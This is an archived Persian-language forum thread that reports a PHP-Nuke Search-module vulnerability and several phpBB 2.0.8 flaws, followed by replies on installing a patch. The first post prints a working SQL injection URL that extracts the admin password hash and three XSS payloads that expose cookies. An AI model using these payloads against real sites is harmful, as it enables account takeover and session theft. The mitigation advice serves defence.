واضح آرشیو وب فارسی:سایت ریسک: t=14428">جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين amirfigo_62 27 تير 1383, 18:10جديترين باگ در PHPNUKE نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3 درجه : critical نويسنده : Janek Vind در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD 5 مدير سايت را به نفوذگر ميدهد كد اكسپلويت : modules.php?name=Search&type=comments& query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors مثال : exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد دريافت سيستم امنيتي مشهدتيم : بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از: ;//localhost/phpbb 208/faq.php? faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/faq.php?mode=bbcode& faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/index.php?category_rows[0][cat_id]=1 &category_rows[0][cat_title]=amir<script>alert(document.cookie);</script> &category_rows[0][cat_order]=99 ------------------ عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد Ashioone007 28 تير 1383, 13:37من patch مشهد تيم رو دريافت كردم ولي نمي تونم در كپوم قسمت بايد آپلود كنم ممنون مي شم منو راهنمايي كنيد amirfigo_62 28 تير 1383, 15:04سلام patch رو از ادرس : دريافت كنيد يك سري پوشه مثل modules - includes داره كه خوب بايد فايلاش جايگزين قبليا بشه فايل هايي هم كه در شاخه اصلي بايد باشه مثل mainfile.php - index.php هم به همين صورت وقتي دارين فايلا رو اپلود ميكنيد كافيه موقعي كه از شما سوال ميشه ميخواين فايل ها over right بشه شما yes to all رو بزنيد تا بصورت كامل patch نصب بشه مثلا اگه فايل class_sql_inject.php رو از پوشه includes اپلود نكنيد سايت شما پيغام خطا ميده چون در mainfile.php تعريف شده كه اول اين فايل فراخواني بشه تا تست كنه ادرسي كه درخواست شده معتبر هست و از كدهاي غير مجاز توش استفاده ميشه يا نه موفق باشيد امير
این صفحه را در گوگل محبوب کنید
[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 852]